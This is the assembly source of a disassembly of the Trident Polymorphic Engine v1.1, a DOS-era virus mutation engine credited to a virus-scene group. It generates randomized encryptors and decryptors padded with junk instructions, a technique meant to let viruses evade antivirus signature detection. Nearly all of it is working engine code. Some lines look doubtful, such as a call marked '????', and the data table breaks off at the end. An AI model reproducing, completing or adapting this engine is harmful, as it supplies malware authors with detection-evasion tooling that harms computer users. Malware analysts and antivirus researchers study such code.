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tpe_v11.asm
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tpe_v11.asm
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.radix 16
;=============================================================================
; =
; Trident Polymorphic Engine v1.1 =
; ------------------------------- =
; =
; Dissassembled by: Lucifer Messiah -- ANARKICK SYSTEMS =
; =
; This dissassembly uses as many of the labels from the =
; TPE v1.2 dissassembly as possible, to allow comparison =
; =
;----------------------------------------------------------------------------=
; =
; Trident Polymorphic Engine v1.1 =
; ------------------------------- =
; =
; Input: =
; ES Work Segment =
; DS:DX Code to be encrypted =
; BP Becomes offset of TPE =
; SI Distance to put between decryptor and code =
; CX Length of code to encrypt =
; AX Bit Field Flags: bit 0: DS will not be equal to CS =
; bit 1: insert random instructions =
; bit 2: put junk before decryptor =
; bit 3: Preserve AX with decryptor =
; =
; Output: =
; ES Work Segment (preserved) =
; DS:DX Decryptor + encrypted code =
; BP Start of decryptor (preserved) =
; DI Length of decryptor/offset of encrypted code =
; CX Length of decryptor + encrypted code =
; AX Length of encrypted code =
; =
;=============================================================================
.model tiny
.code
org 0
public rnd_init
public rnd_get
public crypt
public tpe_top
public tpe_bottom
tpe_top equ $
db '[ MK / TridenT ]' ;encryptor name
crypt:
xor di,di
call dword ptr ds:[5652h] ;????
push cs ;save registers
pop ds
mov byte ptr flags,al
test al,8
je no_push
mov al,50h
stosb
no_push:
call rnd_get ;add a few bytes to cx
and ax,1fh
add cx,ax
push cx ;save length of code
call rnd_get ;get random flags
xchg ax,bx
;--- Flags: -----------------------------------------------
;
; 0,1 encryption method
; 2,3 which registers to use in encryption engine
; 4 use byte or word for encrypt
; 5 MOV AL, MOV AH, or MOV AX
; 6 MOV CL, MOV CH, or MOV CX
; 7 AX or DX
; 8 count up or down
; 9 ADD/SUB/INC/DEC or CMPSW/SCASW
; A ADD/SUB or INC/DEC
; CMPSW or SCASW
; B offset in XOR instrucion?
; C LOOPNZ or LOOP
; SUB CX or DEC CX
; D carry with crypt ADD/SUB
; E carry with inc ADD/SUB
; F XOR instruction value or AX/DX
;
;----------------------------------------------------------
random:
call rnd_get ;get encryption value
or al,al ;is it a 0?
je random ;redo it if it is
mov word ptr xor_val,ax ;store non-zero encryptor
call do_junk ;insert random instructions
pop cx
mov ax,0111h ;make flags to remember which
test bl,20h ; MOV instructions are used
jne z0
xor al,07
z0:
test bl,0ch
jne z1
xor al,70h
z1:
test bl,40h
jne z2
xor ah,7
z2:
test bl,10h
jne z3
and al,73h
z3:
test bh,80h
jne z4
and al,70h
z4:
mov dx,ax
mov_lup:
call rnd_get ;put MOV instrucions in a
and ax,0fh ; random order
cmp al,0ah
ja mov_lup
mov si,ax ;
push cx ;test if MOV already done
xchg ax,cx
mov ax,1
shl ax,cl
mov cx,ax
and cx,dx
pop cx
je mov_lup
xor dx,ax ;remember which MOV done
push dx
call do_mov
call do_nop ;insert a random NOP
pop dx
or dx,dx ;all MOVs done?
jne mov_lup
push di ;save start of decryptor loop
call do_add_ax ;ADD AX for loop
call do_nop
test bh,20h ;carry with ADD/SUB?
je no_clc
mov al,0f8h
stosb
no_clc:
mov word ptr xor_offset,0
call do_xor ;place all loop instructions
call do_nop
call do_add
pop dx ;get start of decryptor loop
call do_loop
test byte ptr store_mov,8 ;insert POP AX?
je no_pop
mov al,58h
stosb
no_pop:
xor ax,ax
test bh,01
je no_pop2
mov ax,cx
dec ax
test bl,10h
je no_pop2
and al,0feh
no_pop2:
add ax,di ;calculate loop offset
add ax,bp
pop si
add ax,si
sub ax,word ptr xor_offset
mov si,word ptr where_len
test bl,0ch ;are BL,BH used for encryption?
jne v2
mov byte ptr es:[si],al
mov si,word ptr where_len2
mov byte ptr es:[si],ah
jmp short v3
v2:
mov word ptr es:[si],ax
v3:
mov dx,word ptr xor_val
pop si ;ds:si=start of code
pop ds
push di ;save pointer to start of code
push cx ; and length of encrypted code
test bl,10h ;byte or word?
je blup
inc cx ;cx=# of crypts (words)
shr cx,1
lup:
lodsw ;encrypt code (words)
call do_encrypt
stosw
loop lup
jmp short klaar
blup:
lodsb ;encrypt code (bytes)
xor dh,dh
call do_encrypt
stosb
loop blup
klaar:
mov cx,di ;cx=lenth decryptor + code
pop ax ;ax=length of decrypted code
pop di ;offset encrypted code
xor dx,dx ;ds:dx=decryptor + cr code
push es
pop ds
retn
;--- Encrypt the Code -------------------------------------
do_encrypt:
add dx,word ptr cs:add_val
test bl,02
jne lup1
xor ax,dx
retn
lup1:
test bl,01
jne lup2
sub ax,dx
retn
lup2:
add ax,dx
retn
;--- Generate MOV reg,xxxx --------------------------------
do_mov:
mov dx,si
mov al,byte ptr ds:mov_byte[si]
cmp dl,04 ;bx?
jne is_not_bx
call add_ind
is_not_bx:
test dl,0ch ;a*?
pushf
jne is_not_a
test bl,80h ;a* or d*?
je is_not_a
add al,02
is_not_a:
call alter ;insert the MOV A*
popf
jne is_not_a2
mov ax,word ptr ds:xor_val
jmp short sss
is_not_a2:
test dl,08 ;b*?
jne is_not_b
mov si,offset where_len
test dl,2
je is_not_bh
add si,2
is_not_bh:
mov word ptr [si],di
jmp short sss
is_not_b:
mov ax,cx ;c*?
test bl,10h ;byte or word encrypt?
je sss
inc ax ;only 1/2 the number of bytes
shr ax,1
sss:
test dl,3 ;byte or word register?
je is_x
test dl,2 ;*h?
je is_not_h
xchg ah,al
is_not_h:
stosb
retn
is_x:
stosw
retn
;--- Insert MOV or alternative for MOV --------------------
alter:
push bx
push cx
push ax
call rnd_get
xchg ax,bx
pop ax
test bl,3 ;use alternative for MOV?
je no_alter
push ax
and bx,0fh
and al,8
shl ax,1
or bx,ax
pop ax
and al,7
mov cl,9
xchg ax,cx
mul cl
add ax,30c0h
xchg ah,al
test bl,4
je no_sub
mov al,28h
no_sub:
call maybe_2
stosw
mov al,80h
call maybe_2
stosb
lea ax,word ptr alt_code
xchg ax,bx
and ax,3
xlat
add al,cl
no_alter:
stosb
pop cx
pop bx
retn
;--- Insert ADD AX,xxxx -----------------------------------
do_add_ax:
push cx
lea si,add_val
mov word ptr [si],0 ;save ADD val
mov ax,bx
and ax,8110h
xor ax,8010h
jne no_add_ax ;use ADD?
mov ax,bx
xor ah,ah
mov cl,3
div cl
or ah,ah
jne no_add_ax ;use ADD?
test bl,80h
jne do_81C2 ;AX or DX?
mov al,5
stosb
jmp short do_add0
do_81C2:
mov ax,0c281h
stosw
do_add0:
call rnd_get
mov word ptr [si],ax
stosw
no_add_ax:
pop cx
retn
;--- generate encryption command --------------------------
do_xor:
test byte ptr ds:flags,1
je no_cs
mov al,2eh ;insert CS: instruction
stosb
no_cs:
test bh,80h ;type of XOR command
je xor1
call get_xor
call do_carry
call save_it
xor ax,ax
test bl,80h
je xxxx
add al,10h
xxxx:
call add_dir
test bh,8
jne yyyy
stosb
retn
yyyy:
or al,80h
stosb
call rnd_get
stosw
mov word ptr ds:xor_offset,ax
retn
xor1:
mov al,80h ;encrypt with value
call save_it
call get_xor
call do_carry
call xxxx
mov ax,word ptr ds:xor_val
test bl,10h
jmp byte_word
;--- generate increase/decrease command -------------------
do_add:
test bl,8 ;no CMPSW/SCASW if BX is used
je da0
test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW
jne do_cmpsw
da0:
test bh,4 ;ADD/SUB or INC/DEC?
je add1
mov al,40h ;INC/DEC
test bh,01
je add0
add al,8
add0:
call add_ind
stosb
test bl,10h
je return
stosb
return:
retn
add1:
test bh,40h ;ADD/SUB
je no_clc2 ;carry?
mov al,0f8h ;insert CLC
stosb
no_clc2:
mov al,83h
stosb
mov al,0c0h
test bh,01
je b0627f
mov al,0e8h ;insert XXX
b0627f:
test bh,40h
je add2
and al,0cfh
or al,10h
add2:
call add_ind
stosb
mov al,01
save_it:
call add_1
stosb
retn
b06293:
test bh,01
je do_cmpsw
mov al,0fdh ;add XXX
stosb
do_cmpsw:
test bh,4 ;CMPSE or SCASW?
je normal_cmpsw
test bl,4 ;no SCASW if SI is used
jne do_scasw
normal_cmpsw:
mov al,0a6h
jmp short save_it
do_scasw:
mov al,0aeh
jmp short save_it
;--- generate LOOP command --------------------------------
do_loop:
test bh,01 ;no JNE if counting down
jne do_loop2
call rnd_get
test al,01
jne cx_loop
do_loop2:
mov al,0e0h ;LOOPNZ or LOOP?
test bh,1ah ; no LOOPNZ if xor-offset
je l10 ; no LOOPNZ if CMP/SCASW
add al,2
l10:
stosb
mov ax,dx
sub ax,di
dec ax
stosb
retn
cx_loop:
test bh,10h ;SUB CX or DEC CX?
jne cx1_dec
mov ax,0e983h
stosw
mov al,1
stosb
jmp short do_jne
cx1_dec:
mov al,49h
stosb
do_jne:
mov al,75h
jmp short l10
;--- add value to AL depending on register type -----------
add_dir:
lea si,word ptr dir_change
jmp short xx1
add_ind:
lea si,word ptr ind_change
xx1:
push bx
shr bl,1
shr bl,1
and bx,3
add al,byte ptr [bx+si]
pop bx
retn
;--- move encyryption command byte to AL ------------------
get_xor:
push bx
lea ax,word ptr how_mode
xchg ax,bx
and ax,3
xlat
pop bx
retn
;--- change ADD to ADC ------------------------------------
do_carry:
test bl,2 ;ADD/SUB used for encryption
je no_ac
test bh,20h
je no_ac
and al,0cfh
or al,10h
no_ac:
retn
;--- change AL (byte/word) --------------------------------
add_1:
test bl,10h
je add_1_ret
inc al
add_1_ret:
retn
;--- change AL (byte/word) --------------------------------
maybe_2:
call add_1 ;can't touch this...
cmp al,81h
je maybe_not
push ax
call rnd_get
test al,1
pop ax
je maybe_not
add al,2
maybe_not:
retn
;--- insert random instructions ---------------------------
do_nop:
test byte ptr ds: flags,2
yes_nop:
je no_nop
call rnd_get
test al,3
je nop8
test al,2
je nop16
b0633b equ $+01h
test al,1
je nop16x
no_nop:
retn
;--- insert random nop (or not) ---------------------------
do_junk:
test byte ptr ds:flags,4
je no_junk
call rnd_get ;put a random number of
and ax,0fh ; dummy instructions before
inc ax ; decryptor
xchg ax,cx
junk_loop:
call junk
loop junk_loop
no_junk:
retn
junk:
call rnd_get
and ax,01eh
jmp short aa0
nop16x:
call rnd_get
and ax,6
aa0:
xchg ax,si
call rnd_get
jmp word ptr ds:junk_cals[si]
;-----------------------------------------------------
junk_cals:
dw offset nop16x0
dw offset nop16x1
dw offset nop16x2
dw offset nop16x3
dw offset nop8
dw offset nop16
dw offset junk6
dw offset junk7
dw offset junk8
dw offset junk9
dw offset junkA
dw offset junkB
dw offset junkC
dw offset junkD
dw offset junkE
dw offset junkF
;-----------------------------------------------------
nop16x0:
add byte ptr [si],cl ;J* 0000 (conditional)
jo yes_nop ;jump on overflow
retn
nop16x1:
mov al,0ebh ;JMP xxxx/junk
and ah,7
inc ah
stosw
xchg ah,al ;get length of bullshit
cbw ;convert AL to AX
jmp fill_bullshit
nop16x2:
call junkD ;XCHG AX,reg/XCHG AX,reg
stosb
retn
nop16x3:
call junkF ;INC/DEC or DEC/INC
xor al,8
stosb
retn
nop8:
push bx
and al,7
lea bx,word ptr nop_data8
xlat
stosb
pop bx
retn
nop16:
push bx
and ax,0303h
lea bx,word ptr nop_data16
xlat
add al,ah
stosb
call rnd_get
and al,7
mov bl,9
mul bl
add al,0c0h
stosb
pop bx
retn
junk6:
push cx
mov al,0e8h
and ah,0fh ;CALL xxxx/junk/POP reg
inc ah
stosw
xor al,al
stosb
xchg ah,al
call fill_bullshit
call do_nop
call rnd_get ;insert POP reg
and al,7
call no_sp
mov cx,ax
or al,58h
stosb
test ch,3 ;more?
jne junk6_ret
call do_nop
mov ax,0f087h ;insert XCHG SI,reg
or ah,cl
test ch,8
je j6_1
mov al,8bh
j6_1:
stosw
call do_nop
push bx
call rnd_get
xchg ax,bx
and bx,0f7fbh ;insert XOR [SI],xxxx
or bl,8
call do_xor
pop bx
junk6_ret:
pop cx
retn
junk7:
and al,0fh ;MOV reg,xxxx
or al,0b0h
call no_sp
stosb
test al,8
pushf
call rnd_get
popf
jmp short byte_word
junk8:
and ah,39h ;DO r/m,r(8,16)
or al,0c0h
call no_sp
xchg ah,al
stosw
retn
junk9:
and al,3bh ;DO r(8,16),r/m
or al,2
and ah,3fh
call no_sp2
call no_bp
stosw
retn
junkA:
and ah,1 ;DO rm,xxxx
or ax,80c0h
call no_sp
xchg ah,al
stosw
test al,1
pushf
call rnd_get
popf
jmp short byte_word
junkB:
call nop8 ;NOP/LOOP
mov ax,0fde2h
stosw
retn
junkC:
and al,9 ;CMPS* or SCAS*
test ah,1
je mov_test
or al,0a6h
stosb
retn
mov_test:
or al,0a0h ;MOV AX,[xxxx] or TEST AX,xxxx
stosb
cmp al,0a8h
pushf
call rnd_get
popf
jmp short byte_word
junkD:
and al,7 ;XCHG AX,reg
or al,90h
call no_sp
stosb
retn
junkE:
and ah,7
or ah,50h
mov al,ah
or ah,8
stosw
retn
junkF:
and al,0fh ;INC/DEC
or al,40h
call no_sp
stosb
retn
;--- store a byte or a word -------------------------------
byte_word:
je only_byte
stosw
retn
only_byte:
stosb
retn
;--- don't fuck with sp -----------------------------------
no_sp:
push ax
and al,7
cmp al,4
pop ax
jne no_sp_ret
and al,0fbh
no_sp_ret:
retn
;--- don't fuck with sp -----------------------------------
no_sp2:
push ax
and ah,38h
cmp ah,20h
pop ax
jne no_sp2_ret
xor ah,20h
no_sp2_ret:
retn
;--- don't use [bp + ..] ----------------------------------
no_bp:
test ah,4
jne no_bp2
and ah,0fdh
retn
no_bp2:
push ax
and ah,7
cmp ah,6
pop ax
jne no_bp_ret
or ah,1
no_bp_ret:
retn
;--- write byte for JMP/CAL and fill with random bullshit -
fill_bullshit:
push cx
xchg ax,cx
bull_lup:
call rnd_get
stosb
loop bull_lup
pop cx
retn
;--- random number generator ------------------------------
rnd_init:
push ax
push cx
call random_init0
and ax,0h
inc ax
xchg ax,cx
random_lup:
call rnd_get ;cal random routine a few
loop random_lup ; times to 'warm up'
pop cx
pop ax
retn
random_init0:
push dx ;initialize generator
push cx
mov ah,2ch
int 21h ;get time CH,CL:DH,DL
in al,40h ;timer
mov ah,al
in al,40h ;timer
xor ax,cx
xor dx,ax
jmp short mov_rnd
rnd_get:
push dx ;calculate random number
push cx
push bx
in al,40h
d06502 equ $+01h
add ax,0000h
d06505 equ $+01h
mov dx,0000h
mov cx,0007h
rnd_lup:
shl ax,1
rcl dx,1
mov bl,al
xor bl,dh
jns rnd_12
inc al
rnd_12:
loop rnd_lup
pop bx
mov_rnd:
mov word ptr cs:d06502,ax
mov word ptr cs:d06505,dx
mov al,dl
pop cx
pop dx
retn
;-----------------------------------------------------
;.data
mov_byte db 0b8,0b0,0b4,00 ;AX,AL,AH,..
db 0b8,0b3,0b7,00 ;BX,GL,GH,..
db 0b9,0b1,0b5 ;CX,CL,CH